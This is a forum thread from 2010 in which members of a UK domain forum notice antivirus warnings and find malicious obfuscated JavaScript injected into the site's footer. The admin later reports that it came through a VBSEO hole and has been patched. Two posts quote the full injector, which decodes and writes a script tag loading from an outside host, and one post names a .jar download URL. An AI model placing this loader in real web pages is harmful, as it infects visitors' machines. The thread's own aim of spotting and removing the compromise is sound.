Buy Sell Discuss UK Domain Names at AcornDomains.co.uk

Today's Drop Dates are: 07-11-2011 or 14-11-2011   All times are GMT. The time now is 08:09:20 PM.
Domain Name Sales Domain Software Calculate UK Domain Drop Dates Domain Registration NameDrive Domain Parking Subscribe to our Domains For Sale newsletter
Go Back   Domain Forum Acorn Domains Buy Sell Auction UK Domains > General and Domain News > Forum News & Feedback
Connect with Facebook

Forum News & Feedback Updates and news for the forum will be post here. Let us know of any issues you have using the site.

Closed Thread
 
LinkBack Thread Tools Display Modes
Old 23-02-2010, 12:55:19 PM     #11 (permalink)

 
Join Date: May 2007
Posts: 845
stevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond reputestevebrowne has a reputation beyond repute

there's something wrong with the footer of the page, as it (a) looks wrong and (b) is forcing each page to the END of the page on each load. PageUp/Dn don't work either initially as if something else has focus. It's OK when I click on the main page area.
stevebrowne is offline  
Old 23-02-2010, 12:57:31 PM     #12 (permalink)

 
Join Date: Nov 2005
Posts: 198
fraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to behold

Yep seeing warnings here from ESET too
fraser is offline  
Old 23-02-2010, 01:02:27 PM     #13 (permalink)

 
Join Date: Nov 2005
Posts: 198
fraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to beholdfraser is a splendid one to behold

something is trying to load

http://binbong. servehttp .com/sdfg.jar
__________________
Home Cinema System
fraser is offline  
Old 23-02-2010, 01:04:01 PM     #14 (permalink)
rob
Founding Member
 
rob's Avatar
 
Join Date: Jan 2005
Posts: 5,879
rob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond reputerob has a reputation beyond repute

yup at footer of page after the GA stuff is:

var AjPdIJYXLs = "VYojT23VYojT33"; var aPzJSlR0bO0 = "VYojT3cVYojT73VYojT63VYojT72VYo"; var aPzJSlR0bO1 = "jT69VYojT70VYojT74VYojT20VYojT7"; var aPzJSlR0bO2 = "3VYojT72VYojT63VYojT3dVYojT22VY"; var aPzJSlR0bO3 = "ojT68VYojT74VYojT74VYojT70VYojT"; var aPzJSlR0bO4 = "3aVYojT2fVYojT2fVYojT6dVYojT6dV"; var aPzJSlR0bO5 = "YojT66VYojT61VYojT76VYojT2eVYoj"; var aPzJSlR0bO6 = "T73VYojT65VYojT72VYojT76VYojT65"; var aPzJSlR0bO7 = "VYojT68VYojT74VYojT74VYojT70VYo"; var aPzJSlR0bO8 = "jT2eVYojT63VYojT6fVYojT6dVYojT2"; var aPzJSlR0bO9 = "fVYojT2fVYojT6dVYojT6cVYojT2eVY"; var aPzJSlR0bO10 = "ojT70VYojT68VYojT70VYojT22VYojT"; var aPzJSlR0bO11 = "3eVYojT20VYojT3cVYojT2fVYojT73V"; var aPzJSlR0bO12 = "YojT63VYojT72VYojT69VYojT70VYoj"; var aPzJSlR0bO13 = "T74VYojT3e"; var pppxhNzbrz = "TviGq23VYojT33"; var gdplog8PER = aPzJSlR0bO0 + aPzJSlR0bO1 + aPzJSlR0bO2 + aPzJSlR0bO3 + aPzJSlR0bO4 + aPzJSlR0bO5 + aPzJSlR0bO6 + aPzJSlR0bO7 + aPzJSlR0bO8 + aPzJSlR0bO9 + aPzJSlR0bO10 + aPzJSlR0bO11 + aPzJSlR0bO12 + aPzJSlR0bO13; var zy7a7KGjPG = "FOmyW23NBx0Y33"; FUPa52wyIc = gdplog8PER.replace(/VYojT/g,"%"); var la27tUrKdS=unescape;var AjPdIJYXLs = "NBx0Y23TviGq33"; q9124=this; var Y07YuuE3KT= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Y07YuuE3KT.write(la27tUrKdS(FUPa52wyIc)); </script><script type="text/javascript"><!--
try {
var pageTracker = _gat._getTracker("");
pageTracker._initData();

pageTracker._trackPageview();


which is calling the ml.php stuff
rob is offline  
Old 23-02-2010, 01:04:54 PM     #15 (permalink)

 
Edwin's Avatar
 
Join Date: Apr 2005
Location: Cambridge, UK
Posts: 3,876
Edwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond reputeEdwin has a reputation beyond repute

Almost 100% certain to be an injection exploit from everything that's been posted.

I recommend if you don't have bang spanking new up to date antivirus software running, stop browsing the forum NOW until it's clearer what's going on. Of course, if you haven't seen a warning it may already be too late!
__________________
Memorable Domains Ltd - Over 7,000 descriptive, generic .co.uk domains for sale
Please note: All sale prices over a week old are automatically invalid. No exceptions. Thanks!
Edwin is offline  
Old 23-02-2010, 01:06:30 PM     #16 (permalink)

 
davedevelopment's Avatar
 
Join Date: May 2009
Location: Brough, East Yorks
Posts: 988
davedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond reputedavedevelopment has a reputation beyond repute

Quote:
Originally Posted by Edwin View Post
Most likely the site's been hacked with some kind of code injection exploit. The version of vbulletin that's running is pretty old after all, if the version number at the foot of the page is correct.
Yeah, this looks dodgy to me, just above some Google Analytics code at the foot of the page.

UPDATE: My bad, didn't see Rob's post.

Code:
<script
var AjPdIJYXLs = "VYojT23VYojT33"; var aPzJSlR0bO0 = "VYojT3cVYojT73VYojT63VYojT72VYo"; var aPzJSlR0bO1 = "jT69VYojT70VYojT74VYojT20VYojT7"; var aPzJSlR0bO2 = "3VYojT72VYojT63VYojT3dVYojT22VY"; var aPzJSlR0bO3 = "ojT68VYojT74VYojT74VYojT70VYojT"; var aPzJSlR0bO4 = "3aVYojT2fVYojT2fVYojT6dVYojT6dV"; var aPzJSlR0bO5 = "YojT66VYojT61VYojT76VYojT2eVYoj"; var aPzJSlR0bO6 = "T73VYojT65VYojT72VYojT76VYojT65"; var aPzJSlR0bO7 = "VYojT68VYojT74VYojT74VYojT70VYo"; var aPzJSlR0bO8 = "jT2eVYojT63VYojT6fVYojT6dVYojT2"; var aPzJSlR0bO9 = "fVYojT2fVYojT6dVYojT6cVYojT2eVY"; var aPzJSlR0bO10 = "ojT70VYojT68VYojT70VYojT22VYojT"; var aPzJSlR0bO11 = "3eVYojT20VYojT3cVYojT2fVYojT73V"; var aPzJSlR0bO12 = "YojT63VYojT72VYojT69VYojT70VYoj"; var aPzJSlR0bO13 = "T74VYojT3e"; var pppxhNzbrz = "TviGq23VYojT33"; var gdplog8PER = aPzJSlR0bO0 + aPzJSlR0bO1 + aPzJSlR0bO2 + aPzJSlR0bO3 + aPzJSlR0bO4 + aPzJSlR0bO5 + aPzJSlR0bO6 + aPzJSlR0bO7 + aPzJSlR0bO8 + aPzJSlR0bO9 + aPzJSlR0bO10 + aPzJSlR0bO11 + aPzJSlR0bO12 + aPzJSlR0bO13; var zy7a7KGjPG = "FOmyW23NBx0Y33"; FUPa52wyIc = gdplog8PER.replace(/VYojT/g,"%"); var la27tUrKdS=unescape;var AjPdIJYXLs = "NBx0Y23TviGq33"; q9124=this; var Y07YuuE3KT= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Y07YuuE3KT.write(la27tUrKdS(FUPa52wyIc)); </script>
__________________
Me: Blog | Company | Twitter

Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk

Last edited by davedevelopment; 23-02-2010 at 01:07:19 PM. Reason: Didn't see Robs post
davedevelopment is offline  
Old 23-02-2010, 01:39:30 PM     #17 (permalink)

 
Systreg's Avatar
 
Join Date: Oct 2008
Location: County Cork Republic of Ireland
Posts: 3,906
Systreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond reputeSystreg has a reputation beyond repute

Domain Trader Rating:
(100% / 104)
Some other sites reporting the same thing in vBulletin, this forum topic about the same thing:

Trojan Horse - Yamaha Grizzly ATV Forum

On page 3 of that topic it gives these 3 links:

Is vBulletin.com Infected by a virus ? - vBulletin.org Forum

*WARNING ABOUT THESE 2 LINKS BELOW*, these are the other 2 links it gives, which I believe are the real vbulletin.com site urls, when I visited them my AVG anti virus gave a virus warning, I've broken the links to prevent accidental clicking:

http://w w w. vbulletin.com/forum/showthread.php?336457-My-vB-3-8-websites-infected-with-Trojan-Downloader-JS-Agent-ewo

http://w w w .vbulletin.com/forum/showthread.php?336433-Malicious-Software

I get no virus warning on Acorn at all, not seeing any of the stuff at the footer of the page either, I'm on Opera browser

Last edited by Systreg; 23-02-2010 at 01:45:06 PM.
Systreg is online now  
Old 23-02-2010, 02:00:52 PM     #18 (permalink)

 
Skinner's Avatar
 
Join Date: Jul 2008
Location: Manchester
Posts: 2,501
Skinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond reputeSkinner has a reputation beyond repute

Seems like its the forum to target firefox. Does anyone WITHOUT firefox have this ?

I use opera myself.
__________________
Browse:
Skinner is offline  
Old 23-02-2010, 04:28:40 PM     #19 (permalink)
Administrator
 
admin's Avatar
 
Join Date: Jun 2004
Posts: 8,517
admin has disabled reputation

It was a virus attack, via VBSEO (not VB directly).

This has been removed and patched.

Please confirm all OK.

Thanks

Admin
admin is offline  
Old 23-02-2010, 05:15:17 PM     #20 (permalink)

 
retired_member12's Avatar
 
Join Date: Aug 2006
Posts: 1,510
retired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond reputeretired_member12 has a reputation beyond repute

Yup, back to normal here.
retired_member12 is offline  
Closed Thread



Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off

Similar Threads
Thread Thread Starter Domain Name Community Replies Last Post
Its a numbers thing - Time for a new forum maybe? mxm Forum News & Feedback 6 07-11-2007 02:11:11 AM
Traffic Domain Names - Forum Kieron Forum News & Feedback 1 20-12-2005 11:08:41 PM
Acorn Domains Forum Terms and Conditions of use AcornDomains.co.uk Forum News & Feedback 0 23-02-2005 10:53:27 PM


All times are GMT. The time now is 08:09:20 PM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.6.0 RC 2
All content on Acorn Domains is member generated and is not moderated before posting. All content is viewed and used by you at your own risk and AD does not warrant the accuracy or reliability of any of the information. The views expressed are those of the individual contributors and not necessarily those of AD. Please contact us to report any issues or send a PM to "Admin".